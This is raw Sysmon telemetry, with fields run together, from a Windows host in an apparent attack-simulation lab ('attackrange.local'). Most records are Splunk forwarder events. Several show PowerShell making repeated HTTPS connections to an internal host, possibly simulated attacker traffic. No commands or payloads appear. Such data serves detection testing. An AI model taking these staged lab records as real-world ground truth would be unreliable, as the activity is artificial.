insufficient disk space 354300x800000000000000035084471Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:20.844{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56610-false10.0.1.12-8089- 23542300x800000000000000035084474Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:57.540{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18AE7CBF456D601BA8899F46676EDA22,SHA256=FE07668234DAD1467281BB96761F1CD7292769C6E68C4752149BA438878D07E7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084473Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:22.144{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56611-false10.0.1.12-8000- 23542300x800000000000000035084475Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:58.555{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=33C75AB6FFC792FF6A8E473A3EA32429,SHA256=358CC3D0D6E5C7B69E5FEDB5D89CAE947E316A92E3208F311D98868765AE291E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084476Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:59.569{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FBC0B9BCD394D9B3C7093345DC47EEE1,SHA256=246747781CFD5793843F084FD4F00ED491077BB69C1692FE59EB107C1069C303,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084477Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:00.586{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C1563FF04C072445A198292AEF9E859,SHA256=BEC80BBEA7845924C926D91578C77FEF09022D127F0BF766F85E61452B48DA69,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084480Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:01.620{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=912983F88AF5E5D9D56590FBCF11B610,SHA256=EDE7ADD914AFE62B993303FF66F07F8F4A81D7CC27FEA0B5C7D9B7FC4A9D97B1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084479Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:26.004{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56612-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084478Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:01.021{B81B27B7-4024-611D-7300-00000000C801}2188NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=F434CCDB2FD59AF574F4FCE12DA37575,SHA256=5BD3EB6E7B65784F061A076E780F933CE348C51938CBFA460C068EF96ECC8B08,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084482Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:27.155{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56613-false10.0.1.12-8000- 23542300x800000000000000035084481Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:02.635{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80C1CD414829D58A17FE487987315F05,SHA256=BCCFE243602BC0FAC5F778F59CE314C467976492109EADE5CD127B4EE2931199,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084483Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:03.683{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0AE9906A6DD60BEC186DDE1AC76CED48,SHA256=DCE00D2883B08CF626A0DA03732EFB7E3FE37910A4CF0892AC0C313BEDBDBD01,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084484Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:11:04.689{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EAAA65218B640B8DCC2C6F0B3EF7EB33,SHA256=085DB88F91981B19C4B259E8139A3E9142ABEAB4BAF08B552A63CD683DBECEC6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084486Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:05.937{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D3B0DE999E2C0147C16E2860CFA89D8D,SHA256=837A089D2CD63061A5BFF0F3CD731733D049AEF73C21656F9FB3FBC1D681F3B6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084485Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:05.088{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=85D4F40B3C43E78D2C204F500FB389DD,SHA256=A47C8050F76B522A79BAB19B23994EA075FEB98AB9C6607505740EBCD57AE1AD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084488Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:06.951{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C972059EBBE27A8DD708C8D24B5F842C,SHA256=5281F71BB4AD5B74B700085F603909B74FAC4A33A2227654FCDDBD884E450C04,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084487Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:30.022{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56614-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084489Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:07.982{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C1F8717FF499F2B32DAA87459BD25BA9,SHA256=C3EBF2A96AA11F177388D817E02FAEE829E449B73823B595C67F9B88E6934288,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084490Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:33.085{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56615-false10.0.1.12-8000- 354300x800000000000000035084493Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:34.038{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56616-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 
23542300x800000000000000035084492Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:09.183{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=D9DE983D2276EB562786452B006846FB,SHA256=40788B94A2F703153A9A48286BCA6788F61F458194639A053EE64982B473F575,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084491Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:09.033{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=09A62041DEF423FEE5F88F84D414459A,SHA256=D4CB02177F70026CF1BCA8362CD34135C8C17FA172823C35BA6E8B10697A89CE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084494Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:10.047{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6CB231DF60AD90113B0EF869C7463B16,SHA256=641BEC56664AFDDC55F467505C0D2DA16DEB961ACE996F3C9D428F4214CE6689,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084495Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:11.080{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A74CE37FD796BAC9A5060621E2140320,SHA256=B73A7B6A6B410EBE0B7772D8F0E6D6A4448D2E0B6581FD804BD9861C16943DA0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084496Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:12.098{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A584FED935785975C91D84EB93FD8F79,SHA256=7C3FA5F119406B481958562D2CB4F86BE6FC0D0ACB48BC18FD76FA104223B2C4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035084506Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:13.581{B81B27B7-4E41-613A-3C90-03000000C801}39484580C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084505Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:13.428{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4E41-613A-3C90-03000000C801}3948C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084504Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:13.428{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084503Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:11:13.428{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084502Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:13.428{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084501Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:11:13.428{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084500Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:13.428{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-4E41-613A-3C90-03000000C801}3948C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035084499Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:13.428{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4E41-613A-3C90-03000000C801}3948C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035084498Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:13.413{B81B27B7-4E41-613A-3C90-03000000C801}3948C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035084497Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:13.128{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF7DC769376D501262D5864F524223E8,SHA256=5EB05E9FDB50385FF5CA66202D7C4926FB96343DFCAF6F3669FD33C249384256,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
23542300x800000000000000035084517Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:14.481{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=575C432E1A0216BB72AF2D6E2B9FA080,SHA256=FD2CB15E9D6806B4CB7E97ACC700894C0C27B726DE470667A7D9072C8CC5A7A6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084516Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:14.481{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=899B1DC9E08B77A1BDACB31884E66EBF,SHA256=582729A365BB2F97A94E1B83EB7B3EF6172FF68F5F7637641AA8A7E50E0AB47E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084515Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:14.181{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AAC4274D042607422BA435AF2A9B7F57,SHA256=0269F16D4E2D9709C2E709E8DAD1C84E4F8E186C6B36F99FF67CF2AC757B6AD6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035084514Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:14.128{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4E42-613A-3D90-03000000C801}944C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084513Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:14.128{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084512Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:12:01.092{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56625-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084574Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:37.726{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF923EE2709FC2CF3687EE566CF02071,SHA256=C9BAD7216EC4F7CE9D6BFCBDC7F5EBA3FEC93722C2055F638F23B8FAB51812DE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084577Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:38.757{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=56FD3C13F520869F6532CB8ED7EC7DD9,SHA256=80B3D7151A5C95BEE29B2D2AF5D373E4B440BF129FAF7AE494C4B36955464B91,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084578Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:11:39.776{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0215305325CC410093A67F9F953FD6DD,SHA256=0EE56A395DE69CFFF359F01CC0C690C1CD35CA7347029226469F32399E45E221,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
